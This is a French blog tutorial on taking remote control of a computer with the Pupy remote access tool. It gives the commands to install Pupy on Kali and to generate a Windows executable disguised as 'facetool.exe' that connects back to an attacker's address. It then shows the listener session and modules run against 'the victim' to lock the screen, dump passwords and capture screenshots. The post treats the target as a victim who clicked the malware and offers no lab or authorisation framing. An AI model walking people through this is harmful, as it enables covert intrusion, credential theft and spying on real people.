Prenez le contrôle d’un ordinateur à distance avec Pupy

By | March 14, 2017

Comment prendre le controle d'un ordinateur à distance avec Pupy ?
Pupy est outil RAT (Remote Administration Tool) en d’autres termes, un outil capable de contrôler à distance un ordinateur. C’est un outil Open Source, multi plate-forme, et également doté d’un interpréteur écrit en Python.
Il offre la possibilité d’exécuter des modules uniquement dans la mémoire laissant ainsi très peu de traces sur la machine victime.
Pupy peut également générer des payloads dans plusieurs types de format de fichier comme des exécutables, des fichiers dll, les apk, etc.
Dans ce billet, nous verrons comment l’installer, puis l’utiliser sous Kali.

Installez Pupy en suivant ces étapes :

# git clone https://github.com/n1nj4sec/pupy.git
# cd pupy
# git submodule init
# git submodule update
# pip install -r requirements.txt

Commençons par créer un fichier malicieux à l’aide du générateur de payload pupygen.py.
Voici les options disponibles du script :

Options de pupygen.py

Créeons un payload destiné à la plate-forme Windows 64-bit à l’aide des options suivantes :

./pupygen.py -f exe_x64 -o facetool.exe connect –host 192.168.1.16:8888

Creation d'un payload à l'aide de pupygen.py

-f exe_x64 représente le format de fichier,
-o facetool.exe l’output qui comprend le nom du fichier (facetool) et l’extension (exe),
–host 192.168.1.16:8888 l’adresse hôte suivi du port. Si vous ne changez pas de port, le script choisira le port 443 (HTTPS), le port par défaut.

Le payload ainsi généré est stocké dans le dossier pupy/pupy.

Le payload

La prochaine étape consiste à changer le port entrant dans le fichier de configuration de Pupy pupy.config.default.

Configuration du port d'entrée dans pupy.config.default

Avant de lancer Pupy, il faudra démarrer le service Postgresql

# service postgresql start

Puis, lancez Pupy à l’aide du script pupysh.py.

# ./pupysh.py

La victime, ayant cliqué sur le malware, une session s’est ouverte automatiquement dans notre shell Pupy.
Pour voir les options disponibles dans le shell, saisissez help.

Options dans la session ouverte de Pupy

Listez tous les modules disponibles à l’aide de list_modules.

Liste des modules disponibles dans la session Pupy

Muni de ces modules, vous pourriez réaliser plusieurs choses intéressantes.
Par exemple, le module manage/lock_screen vérrouille instantannément l’écran de la victime.

Verrouillage de l'écran de la victime

Le module creds/lazagne conçu à partir de Lazagne récupère les mots de passe de la victime.

Tentative de récupération des mots de passe de la victime

Le module gather/screenshot réalise une capture de l’écran de la victime.

Capture d'écran de la victime

Happy Hacking !

mdestroy

Leave a Reply

Your email address will not be published. Required fields are marked *